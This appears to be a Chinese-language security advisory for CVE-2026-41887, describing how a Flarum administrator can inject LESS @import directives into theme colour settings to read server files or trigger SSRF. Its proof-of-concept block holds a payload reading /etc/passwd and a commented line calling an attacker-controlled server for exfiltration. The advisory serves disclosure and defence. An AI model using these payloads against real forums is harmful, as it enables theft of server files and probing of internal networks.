CVE-2026-41887 Flarum 管理员后台LFI/SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-41887

漏洞类型

本地文件包含 (LFI), 服务器端请求伪造 (SSRF)

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Flarum

漏洞概述

Flarum 是开源论坛软件。在 1.8.16 和 2.0.0-rc.1 版本之前，针对 CVE-2023-27577 的补丁未完全覆盖所有 LESS 输入点。攻击者利用管理员权限，可在主题颜色等配置字段中注入恶意 @import 指令，触发本地文件读取或 SSRF 攻击。

技术细节

该漏洞源于 Flarum 对 LESS 编译器输入过滤的不完整性。虽然此前针对 CVE-2023-27577 的补丁限制了 `custom_less` 设置中的 `@import` 和 `data-uri()`，但未对通过 `Extend\Settings::registerLessConfigVar()` 注册的其他 LESS 配置变量（如 `theme_primary_color`）实施相同限制。攻击者需拥有管理员权限，通过后台设置接口，在受影响的颜色配置字段中插入恶意 LESS 代码。由于这些值在 LESS 编译阶段会被原样插入，攻击者可利用 `@import (inline) '<path>'` 语法读取服务器上的敏感文件（如 /etc/passwd）或发起 SSRF 攻击。攻击成功后，可泄露服务器敏感信息或探测内网服务。

攻击链分析

STEP 1

1. 获取权限

攻击者需要获取 Flarum 论坛的管理员账户权限。

STEP 2

2. 访问设置

登录后台，进入外观或主题设置页面。

STEP 3

3. 注入载荷

在主题颜色（如 theme_primary_color）字段中输入包含 @import (inline) '<path>' 的恶意代码。

STEP 4

4. 触发编译

保存设置，系统后台将 LESS 变量编译为 CSS。

STEP 5

5. 获取数据

访问编译生成的 forum.css 文件，查看被导入的本地文件内容，或监听服务器发出的 HTTP 请求以确认 SSRF。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Malicious payload to inject into theme_primary_color setting
// This exploits the LESS compiler to read local files (LFI)
@import (inline) '/etc/passwd';

// Alternatively, for Server-Side Request Forgery (SSRF):
// @import (inline) 'http://attacker-controlled-server/exfiltrate';

影响范围

Flarum < 1.8.16

Flarum < 2.0.0-rc.1

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，请严格限制管理员账户权限，避免给予不可信用户后台访问权限，并加强服务器出站网络流量的监控，以防止潜在的 SSRF 攻击。